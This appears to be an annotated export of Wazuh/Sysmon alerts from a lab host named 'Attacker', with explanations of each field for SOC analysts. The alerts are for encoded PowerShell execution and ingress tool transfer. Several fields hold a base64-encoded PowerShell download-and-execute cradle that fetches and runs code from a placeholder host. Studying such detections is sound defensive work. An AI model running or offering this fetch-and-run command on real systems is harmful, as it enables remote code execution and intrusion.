data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:06.839 ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} ProcessId: 1816 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} ParentProcessId: 5364 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:06.839
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8a-680a-970b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd86-680a-940b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:10.645+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:10.645+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  87
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534350.1788142
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:08.4452638Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285124
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:08.409 ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} ProcessId: 1816 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jawvpd1b.ilj.ps1 CreationUtcTime: 2025-04-24 22:39:08.409 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:08.409
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8a-680a-970b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jawvpd1b.ilj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:08.409
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:13.838+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:13.838+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  84
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534353.1790907
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:11.1567475Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285151
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:09.790 ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} ProcessId: 12064 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} ParentProcessId: 1816 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:09.790
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8d-680a-990b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12064
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd8a-680a-970b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:13.923+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:13.923+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  88
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534353.1798974
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:11.4716773Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285155
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:11.459 ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} ProcessId: 12064 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k2zzxdgo.ova.ps1 CreationUtcTime: 2025-04-24 22:39:11.459 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:11.459
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8d-680a-990b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12064
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k2zzxdgo.ova.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:11.459
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:16.763+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:16.763+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  85
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534356.1801743
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:14.6764079Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285203
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

